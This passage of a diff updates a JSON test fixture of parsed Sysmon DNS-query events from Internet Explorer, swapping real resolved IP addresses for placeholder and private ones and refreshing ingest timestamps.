"A" }, { @@ -19803,7 +19534,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -19811,17 +19542,17 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" } ], "resolved_ip": [ - "159.127.42.114", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "network": { @@ -19839,18 +19570,18 @@ "match.sync.ad.cpe.dotomi.com" ], "ip": [ - "159.127.42.114", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742584600Z", + "ingested": "2021-12-09T13:50:23.457640800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067634800Z'/\u003e\u003cEventRecordID\u003e208\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.730\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sync.ad.cpe.dotomi.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:159.127.42.114;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067634800Z'/\u003e\u003cEventRecordID\u003e208\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.730\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sync.ad.cpe.dotomi.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19925,12 +19656,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { @@ -19947,13 +19678,13 @@ "tps10230.doubleverify.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742593Z", + "ingested": "2021-12-09T13:50:23.457646800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066534000Z'/\u003e\u003cEventRecordID\u003e209\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.627\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10230.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066534000Z'/\u003e\u003cEventRecordID\u003e209\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.627\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10230.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:11.066Z", @@ -20028,12 +19759,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { @@ -20050,13 +19781,13 @@ "tps10221.doubleverify.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742601600Z", + "ingested": "2021-12-09T13:50:23.457652700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066558700Z'/\u003e\u003cEventRecordID\u003e210\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.650\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10221.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066558700Z'/\u003e\u003cEventRecordID\u003e210\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.650\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10221.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:11.066Z", @@ -20120,11 +19851,11 @@ "type": "CNAME" }, { - "data": "31.13.71.36", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -20132,7 +19863,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -20140,7 +19871,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -20148,7 +19879,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -20156,21 +19887,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "31.13.71.36", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -20186,22 +19917,22 @@ "www.facebook.com" ], "ip": [ - "31.13.71.36", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742610200Z", + "ingested": "2021-12-09T13:50:23.457658600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272022200Z'/\u003e\u003cEventRecordID\u003e212\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.329\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.facebook.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 star-mini.c10r.facebook.com;::ffff:31.13.71.36;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272022200Z'/\u003e\u003cEventRecordID\u003e212\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.329\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.facebook.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 star-mini.c10r.facebook.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:17.272Z", @@ -20281,12 +20012,12 @@ "type": "CNAME" }, { - "data": "192.229.163.25", + "data": "192.168.163.25", "type": "A" } ], "resolved_ip": [ - "192.229.163.25" + "192.168.163.25" ] }, "network": { @@ -20306,13 +20037,13 @@ "platform.twitter.com" ], "ip": [ - "192.229.163.25" + "192.168.163.25" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742618800Z", + "ingested": "2021-12-09T13:50:23.457664600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272102900Z'/\u003e\u003cEventRecordID\u003e213\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.386\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eplatform.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.229.163.25;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272102900Z'/\u003e\u003cEventRecordID\u003e213\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.386\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eplatform.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.168.163.25;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:17.272Z", @@ -20372,23 +20103,23 @@ }, "answers": [ { - "data": "104.244.42.8", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.244.42.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.244.42.136", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.244.42.72", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -20396,7 +20127,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -20404,7 +20135,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -20412,7 +20143,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -20421,17 +20152,17 @@ } ], "resolved_ip": [ - "104.244.42.8", - "104.244.42.200", - "104.244.42.136", - "104.244.42.72", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, @@ -20447,24 +20178,21 @@ "syndication.twitter.com" ], "ip": [ - "104.244.42.8", - "104.244.42.200", - "104.244.42.136", - "104.244.42.72", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742627200Z", + "ingested": "2021-12-09T13:50:23.457670400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272134300Z'/\u003e\u003cEventRecordID\u003e214\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esyndication.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:104.244.42.8;::ffff:104.244.42.200;::ffff:104.244.42.136;::ffff:104.244.42.72;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272134300Z'/\u003e\u003cEventRecordID\u003e214\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esyndication.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:17.272Z", @@ -20528,12 +20256,12 @@ "type": "CNAME" }, { - "data": "172.217.10.34", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "network": { @@ -20549,13 +20277,13 @@ "ade.googlesyndication.com" ], "ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742635500Z", + "ingested": "2021-12-09T13:50:23.457676Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 